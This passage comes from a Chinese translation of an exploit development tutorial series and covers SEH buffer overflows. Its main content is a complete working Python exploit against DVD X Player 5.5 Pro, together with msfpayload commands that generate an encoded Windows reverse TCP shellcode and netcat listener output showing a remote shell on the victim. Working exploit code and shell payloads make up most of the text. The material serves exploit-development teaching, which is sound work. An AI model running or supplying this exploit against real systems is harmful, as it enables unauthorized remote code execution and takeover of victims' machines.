- 第一部分: Introduction to Exploit Development
- 第二部分:Saved Return Pointer Overflows
- 第三部分:Structured Exception Handler (SEH)
- 第四部分:Egg Hunters
- 第五部分:Unicode 0x00410041
- 第六部分:WIN32 shellcode 编写
- 第七部分:返回导向编程(ROP)
- 第八部分:堆喷射第一节【覆写 EIP】
- 第九部分:堆喷射[第二章:UAF]
- 第十部分:内核利用程序之栈溢出
- 第十一部分:内核利用程序之任意位置任意写
- 第十二部分:内核利用程序之空指针引用
- 第十三部分:内核利用程序之未初始化栈变量
- 第十四部分:内核利用程序之整数溢出
- 第十五部分:内核利用程序之 UAF
- 第十六部分:内核利用程序之池溢出
- 第十七部分:内核利用程序之任意位置任意写
- 第十八篇:内核利用程序之 RS2 Bitmap 巫术
- 第十九篇:内核利用程序之 Razer
这一系列工作完成. 我们还需要为 EXP 加上我们的 Shellcode. 像以前那样动态计算空间,改变 Shellcode 就会很容易. 像下面, Shellcode 变量可以放进任何我们想要执行的代码。
#!/usr/bin/python -w filename="evil.plf" Shellcode = ( ) #----------------------------------------------------------------------------------# # (*) badchars = '\x00\x0A\x0D\x1A' # # # # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # # (2) nseh = '\xEB\x06' => jump short 6-bytes # # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # # (3) Shellcode space = 1384-bytes # #----------------------------------------------------------------------------------# # SEH Exploit Structure: # # \----------------> # # [AAA..................AAA] [nseh] [seh] [BBB..................BBB] # # \--------------------------------------> # # <-------/ # # (1) Initial overwrite, SEH leads us back 4-bytes to nSEH # # (2) nSEH jumps over SEH and redirects execution to our B's # # (3) We place our Shellcode here ... Game Over! # #----------------------------------------------------------------------------------# evil = "\x90"*20 + Shellcode buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
是时候去生成一些 Shellcode 了,为了不重复这次我决定使用反连 Shell…
root@bt:~# msfpayload -l [...snip...] windows/Shell_bind_tcp_xpfw Disable the Windows ICF, then listen for a connection and spawn a command Shell windows/Shell_reverse_tcp Connect back to attacker and spawn a command Shell windows/speak_pwned Causes the target to say "You Got Pwned" via the Windows Speech API [...snip...] root@bt:~# msfpayload windows/Shell_reverse_tcp O Name: Windows Command Shell, Reverse TCP Inline Module: payload/windows/Shell_reverse_tcp Version: 8642 Platform: Windows Arch: x86 Needs Admin: No Total size: 314 Rank: Normal Provided by: vlad902 <vlad902@gmail.com> sf <stephen_fewer@harmonysecurity.com> Basic options: Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique: seh, thread, process, none LHOST yes The listen address LPORT 4444 yes The listen port Description: Connect back to attacker and spawn a command Shell root@bt:~# msfpayload windows/Shell_reverse_tcp LHOST= LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c[*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) unsigned char buf[] = "\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8" "\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1" "\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5" "\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44" "\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b" "\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e" "\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3" "\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c" "\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30" "\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22" "\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d" "\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e" "\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c" "\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c" "\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6" "\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde" "\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b" "\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17" "\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68" "\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71" "\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff" "\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54"; </stephen_fewer@harmonysecurity.com></vlad902@gmail.com>
加上一些注释,最后的 EXP 如下:
#!/usr/bin/python -w #----------------------------------------------------------------------------------# # Exploit: DVD X Player 5.5 Pro SEH (local BOF) # # OS: Tested XP PRO SP3 (EPG.dll should be universal) # # Author: b33f (Ruben Boonen) # # Software: http://www.exploit-db.com/wp-content/themes/exploit/applications # # /cdfda7217304f4deb7d2e8feb5696394-DVDXPlayerSetup.exe # #----------------------------------------------------------------------------------# # This exploit was created for Part 3 of my Exploit Development tutorial series... # # http://www.fuzzysecurity.com/tutorials/expDev/3.html # #----------------------------------------------------------------------------------# # root@bt:~# nc -lvp 9988 # # listening on [any] 9988 ... # # inverse host lookup failed: Unknown server error # # connect to [] from (UNKNOWN) [] 1044 # # Microsoft Windows XP [Version 5.1.2600] # # (C) Copyright 1985-2001 Microsoft Corp. # # # # G:\tutorial>ipconfig # # ipconfig # # # # Windows IP Configuration # # # # # # Ethernet adapter Local Area Connection: # # # # Connection-specific DNS Suffix . : localdomain # # IP Address. . . . . . . . . . . . : # # Subnet Mask . . . . . . . . . . . : # # Default Gateway . . . . . . . . . : # # # # G:\tutorial> # #----------------------------------------------------------------------------------# filename="evil.plf" #---------------------------------------------------------------------------------------------------------------# # msfpayload windows/Shell_reverse_tcp LHOST= LPORT=9988 R| msfencode -b '\x00\x0A\x0D\x1A' -t c # # [*] x86/shikata_ga_nai succeeded with size 341 (iteration=1) # #---------------------------------------------------------------------------------------------------------------# Shellcode = ( "\xba\x6f\x3d\x04\x90\xd9\xc7\xd9\x74\x24\xf4\x5e\x2b\xc9\xb1" "\x4f\x31\x56\x14\x83\xee\xfc\x03\x56\x10\x8d\xc8\xf8\x78\xd8" "\x33\x01\x79\xba\xba\xe4\x48\xe8\xd9\x6d\xf8\x3c\xa9\x20\xf1" "\xb7\xff\xd0\x82\xb5\xd7\xd7\x23\x73\x0e\xd9\xb4\xb2\x8e\xb5" "\x77\xd5\x72\xc4\xab\x35\x4a\x07\xbe\x34\x8b\x7a\x31\x64\x44" "\xf0\xe0\x98\xe1\x44\x39\x99\x25\xc3\x01\xe1\x40\x14\xf5\x5b" "\x4a\x45\xa6\xd0\x04\x7d\xcc\xbe\xb4\x7c\x01\xdd\x89\x37\x2e" "\x15\x79\xc6\xe6\x64\x82\xf8\xc6\x2a\xbd\x34\xcb\x33\xf9\xf3" "\x34\x46\xf1\x07\xc8\x50\xc2\x7a\x16\xd5\xd7\xdd\xdd\x4d\x3c" "\xdf\x32\x0b\xb7\xd3\xff\x58\x9f\xf7\xfe\x8d\xab\x0c\x8a\x30" "\x7c\x85\xc8\x16\x58\xcd\x8b\x37\xf9\xab\x7a\x48\x19\x13\x22" "\xec\x51\xb6\x37\x96\x3b\xdf\xf4\xa4\xc3\x1f\x93\xbf\xb0\x2d" "\x3c\x6b\x5f\x1e\xb5\xb5\x98\x61\xec\x01\x36\x9c\x0f\x71\x1e" "\x5b\x5b\x21\x08\x4a\xe4\xaa\xc8\x73\x31\x7c\x99\xdb\xea\x3c" "\x49\x9c\x5a\xd4\x83\x13\x84\xc4\xab\xf9\xb3\xc3\x3c\xc2\x6c" "\xa4\x38\xaa\x6e\x3a\x66\x2f\xe6\xdc\x02\x3f\xae\x77\xbb\xa6" "\xeb\x03\x5a\x26\x26\x83\xff\xb5\xad\x53\x89\xa5\x79\x04\xde" "\x18\x70\xc0\xf2\x03\x2a\xf6\x0e\xd5\x15\xb2\xd4\x26\x9b\x3b" "\x98\x13\xbf\x2b\x64\x9b\xfb\x1f\x38\xca\x55\xc9\xfe\xa4\x17" "\xa3\xa8\x1b\xfe\x23\x2c\x50\xc1\x35\x31\xbd\xb7\xd9\x80\x68" "\x8e\xe6\x2d\xfd\x06\x9f\x53\x9d\xe9\x4a\xd0\xad\xa3\xd6\x71" "\x26\x6a\x83\xc3\x2b\x8d\x7e\x07\x52\x0e\x8a\xf8\xa1\x0e\xff" "\xfd\xee\x88\xec\x8f\x7f\x7d\x12\x23\x7f\x54") #----------------------------------------------------------------------------------# # (*) badchars = '\x00\x0A\x0D\x1A' # # # # offset to: (2) nseh 608-bytes, (1) seh 112-bytes # # (2) nseh = '\xEB\x06' => jump short 6-bytes # # (1) seh = 0x61617619 : pop esi # pop edi # ret | EPG.dll # # (3) Shellcode space = 1384-bytes # #----------------------------------------------------------------------------------# # SEH Exploit Structure: # # \----------------> # # [AAA..................AAA] [nseh] [seh] [BBB..................BBB] # # \--------------------------------------> # # <-------/ # # (1) Initial EIP overwrite, SEH leads us back 4-bytes to nSEH # # (2) nSEH jumps over SEH and redirects execution to our B's # # (3) We place our Shellcode here ... Game Over! # #----------------------------------------------------------------------------------# evil = "\x90"*20 + Shellcode buffer = "A"*608 + "\xEB\x06\x90\x90" + "\x19\x76\x61\x61" + evil + "B"*(1384-len(evil)) textfile = open(filename , 'w') textfile.write(buffer) textfile.close()
在下面的截图中我们可以看到, EXP 执行后我们得到一个反连 Shell。游戏结束! !
root@bt:~/Desktop# nc -lvp 9988 listening on [any] 9988 ... inverse host lookup failed: Unknown server error : Connection timed out connect to [] from (UNKNOWN) [] 1044 Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. G:\tutorial>ipconfig ipconfig Windows IP Configuration Ethernet adapter Local Area Connection: Connection-specific DNS Suffix . : localdomain IP Address. . . . . . . . . . . . : Subnet Mask . . . . . . . . . . . : Default Gateway . . . . . . . . . : G:\tutorial>
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
